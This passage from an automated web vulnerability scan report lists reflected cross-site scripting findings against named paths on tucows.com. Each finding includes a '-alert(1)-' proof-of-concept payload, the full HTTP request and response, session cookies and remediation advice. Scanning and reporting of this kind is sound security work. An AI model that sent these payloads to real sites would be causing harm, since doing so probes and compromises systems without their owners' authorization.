HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/yetii.js2d6bc"-alert(1)-"8adb3574f02";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.297. http://www.tucows.com/images/newassets/includes/js/yetii.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 772af"-alert(1)-"9c97d81b22b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/yetii.js?772af"-alert(1)-"9c97d81b22b=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/yetii.js?772af"-alert(1)-"9c97d81b22b=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.298. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e824"-alert(1)-"ef3735f6727 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images4e824"-alert(1)-"ef3735f6727/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images4e824"-alert(1)-"ef3735f6727/newassets/includes/themes/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.299. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5359"-alert(1)-"a9fa148b261 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetse5359"-alert(1)-"a9fa148b261/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetse5359"-alert(1)-"a9fa148b261/includes/themes/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.300. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 175cb"-alert(1)-"c07ddec345e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes175cb"-alert(1)-"c07ddec345e/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes175cb"-alert(1)-"c07ddec345e/themes/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.301. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bed4"-alert(1)-"bc0cdf6abcf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes5bed4"-alert(1)-"bc0cdf6abcf/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes5bed4"-alert(1)-"bc0cdf6abcf/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.302. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7990"-alert(1)-"6641f3a44d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeanyf7990"-alert(1)-"6641f3a44d/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeanyf7990"-alert(1)-"6641f3a44d/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.303. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b53b3"-alert(1)-"2154049023 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeany/style.cssb53b3"-alert(1)-"2154049023 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.cssb53b3"-alert(1)-"2154049023";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.304. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 329b8"-alert(1)-"ca5ec70f733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeany/style.css?329b8"-alert(1)-"ca5ec70f733=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css?329b8"-alert(1)-"ca5ec70f733=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.305. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d20f"-alert(1)-"fab829ca50f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images6d20f"-alert(1)-"fab829ca50f/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images6d20f"-alert(1)-"fab829ca50f/newassets/includes/themes/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.306. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b37a5"-alert(1)-"3c4c9d14a1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsb37a5"-alert(1)-"3c4c9d14a1d/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsb37a5"-alert(1)-"3c4c9d14a1d/includes/themes/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.307. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

